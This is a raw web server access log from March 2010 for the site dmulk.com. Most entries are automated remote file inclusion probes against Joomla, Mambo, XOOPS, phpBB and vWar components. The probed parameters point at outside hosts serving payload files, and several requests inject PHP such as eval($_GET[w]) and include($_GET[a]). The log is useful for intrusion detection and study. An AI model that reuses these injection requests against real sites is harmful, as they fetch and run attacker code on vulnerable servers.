72.233.114.90 - - [12/Mar/2010:09:10:10 -0800] "GET /logs/access_090425.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:10 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:11 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:11 -0800] "GET /logs/access_090808.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:11 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:11 -0800] "GET /logs/access_090425.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:11 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:11 -0800] "GET /logs/access_090808.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.149.84.46 - - [12/Mar/2010:09:10:14 -0800] "GET /logs/access_091021.log%20%20//include/setup.php?dir=http://cyberzins.fileave.com/n1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:10:16 -0800] "GET /logs//administrator/components/com_joomap/classes/JoomapConfig.php?mosConfig.absolute.path=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:10:16 -0800] "GET /administrator/components/com_joomap/classes/JoomapConfig.php?mosConfig.absolute.path=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:10:16 -0800] "GET /logs/access_090730.log//administrator/components/com_joomap/classes/JoomapConfig.php?mosConfig.absolute.path=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:20 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:20 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:20 -0800] "GET /logs/access_090808.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:20 -0800] "GET /logs/access_090425.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:20 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:20 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:20 -0800] "GET /logs/access_090808.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.233.114.90 - - [12/Mar/2010:09:10:20 -0800] "GET /logs/access_090425.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
58.168.30.17 - - [12/Mar/2010:09:10:24 -0800] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/004.jpg HTTP/1.1" 200 348622 "http://canberrariders.org.au/forum/viewtopic.php?f=3&t=6531" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:10:29 -0800] "GET /logs/access_081016.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:10:29 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:10:29 -0800] "GET /logs/access_081016.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:10:29 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:10:29 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:10:29 -0800] "GET /%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:10:30 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:09:10:37 -0800] "GET /logs/access_090630.log//administrator/components/com_joomap/classes/JoomapConfig.php?mosConfig.absolute.path=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:09:10:37 -0800] "GET /logs/access_091205.log%20%20/auth/auth_phpbb/phpbb_root_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.119.152.183 - - [12/Mar/2010:09:10:38 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.119.152.183 - - [12/Mar/2010:09:10:38 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.119.152.183 - - [12/Mar/2010:09:10:38 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:10:39 -0800] "GET /logs/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:10:41 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:10:41 -0800] "GET /logs/access_091122.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:10:44 -0800] "GET /logs/access_090516.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:10:46 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.119.152.183 - - [12/Mar/2010:09:10:56 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.119.152.183 - - [12/Mar/2010:09:10:56 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.119.152.183 - - [12/Mar/2010:09:10:57 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:11:03 -0800] "GET /logs/access_090107.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:11:06 -0800] "GET /%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:11:06 -0800] "GET /logs/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.119.152.183 - - [12/Mar/2010:09:11:08 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:11:08 -0800] "GET /logs/access_081103.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:11:16 -0800] "GET /logs/access_081103.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.152.217.250 - - [12/Mar/2010:09:11:16 -0800] "GET /logs/access_090107.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.119.152.183 - - [12/Mar/2010:09:11:44 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:11:46 -0800] "GET /logs/access_081014.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:11:46 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:11:47 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:11:47 -0800] "GET /logs/access_080622.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:11:48 -0800] "GET /logs/access_090425.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:11:48 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:11:48 -0800] "GET /logs/access_080622.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:11:48 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:11:48 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:11:48 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:11:48 -0800] "GET /logs/access_090425.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:11:50 -0800] "GET /logs/access_081014.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:11:51 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:11:51 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:11:52 -0800] "GET /logs/access_080519.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:11:52 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:11:53 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:11:55 -0800] "GET /logs/access_090424.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:11:55 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:11:56 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:11:57 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:11:57 -0800] "GET /logs/access_090808.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:11:57 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:12:00 -0800] "GET /logs/access_080825.log///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:12:01 -0800] "GET /logs/access_080607.log///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:03 -0800] "GET /logs/access_090808.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:03 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:03 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:03 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:03 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:03 -0800] "GET /logs/access_090808.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:04 -0800] "GET /logs/access_090808.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:04 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:04 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:12:09 -0800] "GET /logs/access_090519.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.133.120 - - [12/Mar/2010:09:12:11 -0800] "GET /logs/access_090519.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:12:15 -0800] "GET /logs/access_090519.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:12:16 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:16 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:16 -0800] "GET /logs/access_090425.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:16 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:12:16 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:16 -0800] "GET /logs/access_090425.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:16 -0800] "GET /logs/access_080622.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:16 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:16 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:12:16 -0800] "GET /logs/access_090506.log%20%20//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:12:16 -0800] "GET /logs/access_080622.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:09:12:24 -0800] "GET /logs/access_091031.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:09:12:33 -0800] "GET /logs/access_080706.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:09:12:33 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:09:12:33 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.209 - - [12/Mar/2010:09:12:41 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.209 - - [12/Mar/2010:09:12:42 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 200 15073 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.209 - - [12/Mar/2010:09:12:49 -0800] "GET /logs/access_090405.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.46.195.227 - - [12/Mar/2010:09:12:59 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:13:05 -0800] "GET /logs/access_090425.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:13:05 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:13:05 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:13:05 -0800] "GET /logs/access_080622.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:13:09 -0800] "GET /logs/access_090425.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:13:09 -0800] "GET /logs//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:13:09 -0800] "GET /include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:13:09 -0800] "GET /logs/access_080622.log%20%20//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.95.229.230 - - [12/Mar/2010:09:13:13 -0800] "GET /logs/access_080228.log//include/logout.php?PSA_PATH=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.180.124.146 - - [12/Mar/2010:09:13:14 -0800] "GET /logs/////////?_SERVER%5BDOCUMENT_ROOT%5D=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 200 142825 "-" "Mozilla/5.0" "www.dmulk.com"
211.180.124.146 - - [12/Mar/2010:09:13:14 -0800] "GET ////////?_SERVER%5BDOCUMENT_ROOT%5D=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 200 15133 "-" "Mozilla/5.0" "www.dmulk.com"
